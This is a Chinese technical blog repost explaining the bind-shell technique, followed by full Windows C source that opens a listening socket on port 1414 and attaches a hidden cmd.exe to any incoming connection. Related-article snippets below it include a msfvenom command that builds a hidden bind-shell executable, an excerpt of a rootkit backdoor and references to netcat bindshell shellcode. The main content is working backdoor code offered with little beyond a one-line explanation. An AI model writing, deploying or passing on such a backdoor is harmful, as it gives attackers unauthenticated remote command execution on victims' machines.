Bindshell原理

最新推荐文章于 2023-07-06 17:43:33 发布
最新推荐文章于 2023-07-06 17:43:33 发布
阅读量1.2k 收藏 1
点赞数
文章标签: shell
原文链接:http://blog.51cto.com/haidragon/2125220
版权

原理很简单就是创建一个进程打开一个终端然后标准输入输出句柄重定位到一个网络端口
c版 win系统

#include<winsock2.h>
#pragma comment(lib,"Ws2_32.lib")
int _tmain(int argc, TCHAR* argv[])
{
    //1.初始化一个sock服务
    WSADATA stWSA;
    WSAStartup(0x0202, &stWSA);
    SOCKET stListen = INVALID_ATOM;
    //2.创建一个原始套接字
    stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
    SOCKADDR_IN stService;
    stService.sin_addr.s_addr = INADDR_ANY;
    //3.在任意地址上绑定一个端口
    stService.sin_port = 1414;
    stService.sin_family = AF_INET;
    bind(stListen, (LPSOCKADDR)&stService, sizeof(stService));
    //4.监听连接
    listen(stListen, SOMAXCONN);
    //5.接受一个连接
    stListen = accept(stListen, 0, 0);
    //6.创建一个cmd进程 并将其输入与输出重定位到我们创建的套节字上
    PROCESS_INFORMATION stPI = { 0 };
    STARTUPINFOA stSI = { 0 };
    stSI.cb = sizeof(stSI);
    stSI.wShowWindow = SW_HIDE;
    stSI.dwFlags = STARTF_USESTDHANDLES;
    stSI.hStdInput = (HANDLE)stListen;
    stSI.hStdError = (HANDLE)stListen;
    stSI.hStdOutput = (HANDLE)stListen;
    CreateProcessA(0, "cmd.exe", 0, 0, TRUE, 0, 0, 0, &stSI, &stPI);
    //7.关闭相关句柄并释放相关资源
    CloseHandle(stPI.hProcess);
    CloseHandle(stPI.hThread);
    closesocket(stListen);
    WSACleanup();
    return 0;

}

转载于:https://blog.51cto.com/haidragon/2125220

weixin_33752045
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
不想当脚本小子的脚本小子
03-19 355
在内网渗透中,正向 bind shell 会经常用到,正反向shell:反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。 首先通过 MSF 生成一个正向 shell: msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe 使用pytho.
From Zero to ARM Assembly Bind Shellcode
04-23
此外,作者可能会通过实际案例来展示如何分析和构造特定类型的Shellcode,比如bind shell,它能够使远程攻击者与受害者的机器建立持久的连接。读者可以通过这些实例学习到如何从零开始编写功能完整的Shellcode,并...
一个bindshell的代码
Yatere的天平秤
02-05 1125
/* * Win32 RootKit - cmd.exe remote shell backdoor * (c) 2003 Christophe Devine * Distributed for educational purposes only! * * Before running ntbindshell.exe, rename it to * "rsmss.exe" and c
3.7 bindshell编写
qq_55202378的博客
08-22 546
bindshell
Shell内建命令之bind
荣耀之路
03-13 1091
Shell内建命令之bind
shellcode中变形bindshell的实现
whatday的专栏
09-28 866
最近学习《0day安全》一书 记录一下调试编码过程 书中环境XP VC6 本机的环境是server 2008 r2 x64  编译环境是vs2013    第一步: 首先是写一个win c版本的bindshell 代码如下: #include&lt;winsock2.h&gt; #pragma comment(lib,"Ws2_32.lib") void main() { //1...
dns_shell从入门到高手.7z
06-26
这本书是DNS领域的经典之作,介绍了DNS(域名系统)的工作原理BIND(Berkeley Internet Name Domain)服务器的配置与管理。DNS是互联网的核心组成部分,它将易于记忆的域名转换为IP地址,便于网络通信。书中将涵盖...
rrs.tar.gz_python 实现shell_remote
09-14
这些简化的示例展示了反向shell的基本工作原理,实际应用中可能需要考虑更多细节,如错误处理、加密通信、持久连接等。 总结来说,“rrs”这个Python实现可能是一个反向远程shell的工具,它利用Python的socket库来...
driveby:杀死给定端口上的任何东西
06-25
5. **系统调用**:`driveby` 可能使用了一些系统调用,如 `socket()`、`bind()` 和 `listen()` 来检测端口上的活动,以及 `kill()` 来终止进程。 6. **安全实践**:使用此类工具时需谨慎,避免误杀重要的系统服务。...
dnssec-cpanel
06-16
在没有cPanel的环境中,虽然过程更加复杂,但通过理解DNSSEC的工作原理和手动配置,也能实现相同的目标。在部署DNSSEC时,务必考虑其兼容性、错误处理和维护工作,以确保系统的稳定性和安全性。
pwncat:pwncat-使用防火墙,IDSIPS规避,绑定和反向外壳,自注入外壳和端口转发魔术的类固醇上的netcat-以及可完全用Python(PSE)编写的脚本
04-28
| | | | | | | pwncat Netcat支持类固醇,具有防火墙,IDS / IPS规避,绑定和反向外壳,自注入外壳和端口转发魔术-以及可完全用Python( PSE )编写的脚本。 代码风格 集成测试[2] 造型器 地位 黑色的 py [1] pycodestyle pydocstyle 皮林特 Python操作系统 Linux 苹果系统 视窗 2.7 3.5 3.6 3.7 3.8 pypy2 pypy3 [1] mypy类型覆盖率(完整输入:93.97%) [2]构建失败并不表示功能已损坏。 集成测试运行多个小时,并由于各种不同的原因(网络超时,GitHub Action的未知取消等)而偶尔中断: #735 , #841 动机 您是否曾经偶然在您的反向外壳上按Ctrl + c并永久消失了? 是否曾经因为防火墙没有让客
ARM汇编之TCP Bind Shell
github_38641765的博客
12-12 500
bind shell 作为一个bind shell,也就是在服务器上运行的shellcode,等待hacker去主动连接,所以它的主要工作就是监听固定端口,等待外部连接即可 C代码(Linux,都是使用man命令查询的命令介绍) 指令 介绍 socket int socket(int domain, int type, int ...
linux bind shell,Linux/x86 - netcat bindshell port 6666 - 69 bytes
weixin_32751907的博客
05-15 94
/*** Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes** Date: 2011-04-20** Author: Jonathan Salwan**** http://shell-storm.org** http://twitter.com/#!/shell_storm**** /usr/bin/netca...
linux下端口绑定shellcode编写与实现
weixin_33695082的博客
01-08 683
  本次实验都是基于《灰帽黑客:正义黑客的道德规范、渗透测试、攻击方法和漏洞分析技术》 实现端口绑定shellcode有下面几个步骤: (1)     创建一个TCP套接字; (2)     将该套接字绑定到攻击者指定的端口,这个端口通常会被硬编码到shellcode中; (3)     让该套接字成为侦听套接字; (4)     接受新连接; (5)     将新接受的套接字复制到s...
开源一个ShellCode生成框架
鬼手的博客
05-25 2761
文章目录前言项目预览项目配置文件命名与作用ShellCode大小的计算方法第一部分 ShellCode生成第二部分 ShellCode部分ShellCode加载器如何提取ShellCode如何扩展ShellCode框架?参考资料项目下载 前言 现阶段,shellcode编写门槛高,大多需要有较深的汇编功底,而Metersploit上的Shellcode开源生成框架,功能单一,扩展性差,大多只能在d...
linux漏洞Bind Shell Backdoor Detection
最新发布
arissa666的博客
07-06 212
Bind Shell Backdoor Detection利用。telnet 主机地址 1524。
高级shellcode(Payload_Bindshell
weixin_34184561的博客
06-05 317
1.函数加密 //函数加密 摘要 (条件尽可能避免有0x00 尽可能避免发生碰撞)注意没有加.dll int Hash_GetDigest(char * strFunName) { unsigned int nDigest = 0; while (*strFunName) { nDigest = ((nDigest << 25) | nDig...
[原创]K8 MSF Bind Shell TCP 连接工具
weixin_30562507的博客
01-12 350
工具:K8_MSFBindShellClient_20170524[K.8]编译:自己查壳组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2017/5/241:51:02简介:MSF Bind Shell TCP Client 无需安装MSF环境,连接msf绑定shell图片: 功能:下载地址文件...
golang通过websocket实现ssh、telnet、正向shell(bind shell)终端交互
u013071014的博客
05-06 3277
1. gin框架注册路由 func init() { routerCheckRole = append(routerCheckRole, registerTgWsRouter) } // 需认证的路由代码 func registerTgWsRouter(v1 *gin.RouterGroup, authMiddleware *jwt.GinJWTMiddleware) { api := apis.TgWs{} r := v1.Group("") { // 协议、IP、端口 r.GET("/
192.168.4.5 DNS脚本配置教程:正反向解析与实践
本篇文章是一份关于shell脚本项目的详细笔记文档,主要介绍了两个部分:DNS服务配置脚本的编写与实现。...通过这些脚本,读者可以深入理解DNS的工作原理,并提升在Linux系统中使用shell脚本进行网络配置的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值